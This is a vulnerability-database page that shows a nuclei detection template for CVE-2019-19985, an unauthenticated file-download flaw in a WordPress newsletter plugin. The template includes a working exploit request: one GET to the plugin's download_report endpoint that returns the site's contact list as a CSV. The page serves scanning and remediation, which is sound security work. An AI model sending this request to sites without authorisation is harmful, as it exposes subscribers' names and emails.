Lucene search
K

WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 66 Views

WordPress Email Subscribers & Newsletters plugin before 4.2.3 allows arbitrary file retrieval leading to unauthorized access and data leakage

Related
Refs
Code
id: CVE-2019-19985

info:
  name: WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval
  author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
  severity: medium
  description: WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can  obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Update to the latest version of WordPress Email Subscribers & Newsletters plugin (4.2.3) or apply the patch provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/48698
    - https://wpvulndb.com/vulnerabilities/9946
    - https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/
    - http://packetstormsecurity.com/files/158563/WordPress-Email-Subscribers-And-Newsletters-4.2.2-File-Disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19985
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-19985
    cwe-id: CWE-862
    epss-score: 0.71399
    epss-percentile: 0.99335
    cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: icegram
    product: email_subscribers_\&_newsletters
    framework: wordpress
  tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Name
          - Email
          - Status
          - Created On
        condition: and

      - type: word
        part: header
        words:
          - "Content-Disposition: attachment; filename=all-contacts.csv;"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022075438e3526e46f26abbbf848d314b8b9799f80c42ba002c0a02dc00036b32fc7022100df2df141cc3a59541945c9e1c3ac08c07f446be658b52c2de3ead687bc7fffd0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
CVSS 3.15.3
CVSS 35.8
EPSS0.71399
66